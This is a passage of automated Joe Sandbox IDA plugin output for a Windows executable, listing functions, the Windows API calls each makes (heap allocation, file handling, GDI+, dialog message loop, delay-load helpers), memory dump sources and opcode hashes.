                    • Part of subcall function 009F3B3D: __EH_prolog.LIBCMT ref: 009F3B42
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: c86365bfc4197a3d790f70cf9994aadf7eb64755c5ba940d57c931507c4fc83d
                  • Instruction ID: 76396367dac219ebae356eeb95cde4d0b08c48163d56616a830aa4531dcdeea6
                  • Opcode Fuzzy Hash: c86365bfc4197a3d790f70cf9994aadf7eb64755c5ba940d57c931507c4fc83d
                  • Instruction Fuzzy Hash: 9D21377290410CDFCB25EF98DA51AEEFBF6BF58300B10046EE945A7251CB325E10DBA0
                  APIs
                  • __EH_prolog.LIBCMT ref: 00A0A7C8
                    • Part of subcall function 009F1380: __EH_prolog.LIBCMT ref: 009F1385
                    • Part of subcall function 009F1380: new.LIBCMT ref: 009F13FE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 81b23aba5cf5c29bb404d2a83324b40a9f99cb68a8dcdb28bd705f1c19a696e3
                  • Instruction ID: 7262c2524bc140af93d218198e3c8c596dd6a469cc04614d3ad5ea87afa21f7f
                  • Opcode Fuzzy Hash: 81b23aba5cf5c29bb404d2a83324b40a9f99cb68a8dcdb28bd705f1c19a696e3
                  • Instruction Fuzzy Hash: 44214C71C0424DEECF15DF98D9529EEBBB4EF59300F1044AEE809A7242DB356E06DBA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a9a7ed644af151d0e38eea5806a7210e2bee4dcd0f73140afbf5b7ec74a5d8c5
                  • Instruction ID: 2792f07bb98c0773752e2d511d44c26b4bd2fff6f74f5a2f5220904c61dd358d
                  • Opcode Fuzzy Hash: a9a7ed644af151d0e38eea5806a7210e2bee4dcd0f73140afbf5b7ec74a5d8c5
                  • Instruction Fuzzy Hash: A1118E73A0052D9BCF26AAA8CD41BFEB736AF88750F044125FA04A7291CA759D1087A0
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction ID: 2655546366c9e8c8c654de75f32c738c207b3243a53d6725c68810e960086302
                  • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                  • Instruction Fuzzy Hash: 12F08CB0500B0E9FDB30DA65C945726B7EEEB15320F20891AE69AC2680E770D888C742
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F5BDC
                    • Part of subcall function 009FB07D: __EH_prolog.LIBCMT ref: 009FB082
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: f6aa7fabb04d817529b4a93f11e0639ca0c209176db2596051e323c895aa5903
                  • Instruction ID: efc027f5a211f906b93bb4562919c21279a9a7a3e627c07137ae83ad49d9a57c
                  • Opcode Fuzzy Hash: f6aa7fabb04d817529b4a93f11e0639ca0c209176db2596051e323c895aa5903
                  • Instruction Fuzzy Hash: 6901D130A01688DAC724F7B8E0253EDF7A49F5D300F40419DA95A132D3CFB01B08C762
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: f3f1feb81c9c2db1844b67a95e5fbb11dda61d2da0b08a55e782c8a6a6e24ecb
                  • Instruction ID: e8046899ad88d7952fcb032e09ff81714f592babcb7953d625bd7a91f2f82fc4
                  • Opcode Fuzzy Hash: f3f1feb81c9c2db1844b67a95e5fbb11dda61d2da0b08a55e782c8a6a6e24ecb
                  • Instruction Fuzzy Hash: 50E0E5316406619BEB3127696C00BEA379EDF517B0F140220AC14A6091DE2CCCC145E5
                  APIs
                  • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,009F968F,?,?,?,?,00A21FA1,000000FF), ref: 009F96EB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ChangeCloseFindNotification
                  • String ID:
                  • API String ID: 2591292051-0
                  • Opcode ID: 8825633521263b481a9bd376e44b51761fadb558e0e9fd9cf44e1248013ba2c2
                  • Instruction ID: 82aaebf3485bb5eb4ef1df6bbfb7f4c7565fc5c46746183b7e8acdb8c55a99b1
                  • Opcode Fuzzy Hash: 8825633521263b481a9bd376e44b51761fadb558e0e9fd9cf44e1248013ba2c2
                  • Instruction Fuzzy Hash: D2F08231556B088FDB309A24D5597A2B7E89B13739F048B1ED2F7834E0E765688E8F10
                  APIs
                  • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 009FA4F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 595e115e6432180494c60c577113493f1528e3ed0c0916b0b7ba88bc0ef2e2e7
                  • Instruction ID: d9d7a8fe55745c1628232551e11906207059078eb977623bc9530e90d35cec09
                  • Opcode Fuzzy Hash: 595e115e6432180494c60c577113493f1528e3ed0c0916b0b7ba88bc0ef2e2e7
                  • Instruction Fuzzy Hash: 5EF0E97100C384AACA325BB888047EA7B946F46331F04CA09F3FD02191C2B824C69733
                  APIs
                  • SetThreadExecutionState.KERNEL32(00000001), ref: 00A006B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ExecutionStateThread
                  • String ID:
                  • API String ID: 2211380416-0
                  • Opcode ID: 2ad9fcb17a2b8537654d188b55f31672612e558c1509c0ecfb2c4e95dfb9dc02
                  • Instruction ID: 13db5dd0491b8e56f8fcafd2f77734cf1f2590e10f905e9b7af30a490dda837d
                  • Opcode Fuzzy Hash: 2ad9fcb17a2b8537654d188b55f31672612e558c1509c0ecfb2c4e95dfb9dc02
                  • Instruction Fuzzy Hash: 8BD0122664415826DA257378BA19BFE1A1B4FC3710F090065B50D575C68A8B089757A2
                  APIs
                  • GdipAlloc.GDIPLUS(00000010), ref: 00A09D81
                    • Part of subcall function 00A09B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A09B30
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Gdip$AllocBitmapCreateFromStream
                  • String ID:
                  • API String ID: 1915507550-0
                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction ID: 35b464555df97b91bfae3fe43bf7922cf4d44ee7d10ed7c2b98d959cba894e43
                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                  • Instruction Fuzzy Hash: AAD0A73025420C7BDF40FB70AC0297B7BA8DB04310F008065BC08861C2FD71DE10A261
                  APIs
                  • GetFileType.KERNELBASE(000000FF,009F9887), ref: 009F9995
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileType
                  • String ID:
                  • API String ID: 3081899298-0
                  • Opcode ID: a2bcfa324071475e2cfb78eb394fb91ac54a5d813879d65a13d5a16ae4d9a2f9
                  • Instruction ID: 44e267250a227ebeb7554a9a348cb2e75d4684008f1fea5286b0ddacda4ffca8
                  • Opcode Fuzzy Hash: a2bcfa324071475e2cfb78eb394fb91ac54a5d813879d65a13d5a16ae4d9a2f9
                  • Instruction Fuzzy Hash: 3FD01236011144958F3586384D092B97755DB83376B39C6E8D125C40A1D763C983F641
                  APIs
                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00A0D43F
                    • Part of subcall function 00A0AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0AC85
                    • Part of subcall function 00A0AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A0AC96
                    • Part of subcall function 00A0AC74: IsDialogMessageW.USER32(0001042A,?), ref: 00A0ACAA
                    • Part of subcall function 00A0AC74: TranslateMessage.USER32(?), ref: 00A0ACB8
                    • Part of subcall function 00A0AC74: DispatchMessageW.USER32(?), ref: 00A0ACC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                  • String ID:
                  • API String ID: 897784432-0
                  • Opcode ID: 2c9d4dd13be0e210f000d90e81afb50908a65ba7f69e22047430b10f6e73116e
                  • Instruction ID: 4e62092ce563de88937b871f4ccc79b4b4161d812447581acc7a95fc71c437a3
                  • Opcode Fuzzy Hash: 2c9d4dd13be0e210f000d90e81afb50908a65ba7f69e22047430b10f6e73116e
                  • Instruction Fuzzy Hash: 43D09E31144304ABD6156B91DE06F1F7AA6BF98B05F004654B345740F18662AD219B16
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 01fd8796ea09d7422de92b17f27aee3c407a6887426e0d00bb661b2f5792b9e1
                  • Instruction ID: 8a34d4a108f5c12beba6adacb4d4516b34ebe1759af7f899d1c9a1923c3bdc4e
                  • Opcode Fuzzy Hash: 01fd8796ea09d7422de92b17f27aee3c407a6887426e0d00bb661b2f5792b9e1
                  • Instruction Fuzzy Hash: EDB012B767C50ABE710861987E42E3B031CF4C1B11334C92AF609D00C0D4807C0C0A31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c01e0df790aba92a6b907398bd681e03e76008373c529aec59f2a155777b5e6a
                  • Instruction ID: c5f53be434604e51fa6f9fa12183d983f453388974e63d23c3b38701c391a8c3
                  • Opcode Fuzzy Hash: c01e0df790aba92a6b907398bd681e03e76008373c529aec59f2a155777b5e6a
                  • Instruction Fuzzy Hash: A8B012B377D406BE710861887E02E37031CE4C2B11334C92AB909D01C0D4806C0D0D31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 78f7063cbcdbef39524faf3f6d7b4337c4c3e4e4f9b1c87e7c333c779e0bb8a8
                  • Instruction ID: 1cf96ae6d63e039a602c296e4acac303df703cd93e84350e4ae0afd7fe50056a
                  • Opcode Fuzzy Hash: 78f7063cbcdbef39524faf3f6d7b4337c4c3e4e4f9b1c87e7c333c779e0bb8a8
                  • Instruction Fuzzy Hash: E4B012B767C706BE710821847E52D3B031CE4C1B11334CE3AF609E00C0D8807C4C4831
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 3aa247258eb33caba8c1ea2dc8a63c1e3bb3f61c069b5314c1f58d7fa474769f
                  • Instruction ID: 5995f5bfa65bef1dd42e9930d3d6c8bf3073d43f425af9d5e41ce5b3338b88cb
                  • Opcode Fuzzy Hash: 3aa247258eb33caba8c1ea2dc8a63c1e3bb3f61c069b5314c1f58d7fa474769f
                  • Instruction Fuzzy Hash: 04B012B367C506BE714861887E02E37031CE4C1B11334CA2AB50DD00C0D8806C4C0931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c6e39cc0b9a4a2b592cd01bf502dc85e6621214a7e98a0d91a8a58cf5677066e
                  • Instruction ID: e27fb5d83f78c66e5956950112ce6184c0235b25af04179ffa155835a1a9fa70
                  • Opcode Fuzzy Hash: c6e39cc0b9a4a2b592cd01bf502dc85e6621214a7e98a0d91a8a58cf5677066e
                  • Instruction Fuzzy Hash: 81B012B367C406BE710C61887F02E37031CE4C1B11334C92AB50DD00C0E4806D0D0931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0D8A3
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 88f06b7cbdda91e0e21ae195a45e5dcf2eec7624a74f641b932fb0332f7a97b0
                  • Instruction ID: 05bcd3926adb44bd0b60a3db6edc8906ab985b9e3dafad2ab34669b6376537e2
                  • Opcode Fuzzy Hash: 88f06b7cbdda91e0e21ae195a45e5dcf2eec7624a74f641b932fb0332f7a97b0
                  • Instruction Fuzzy Hash: C6B012B367C406BE710C61997E02E37031CF4C1B11334C92AB50DD00C0D4806C0C0931
                  APIs
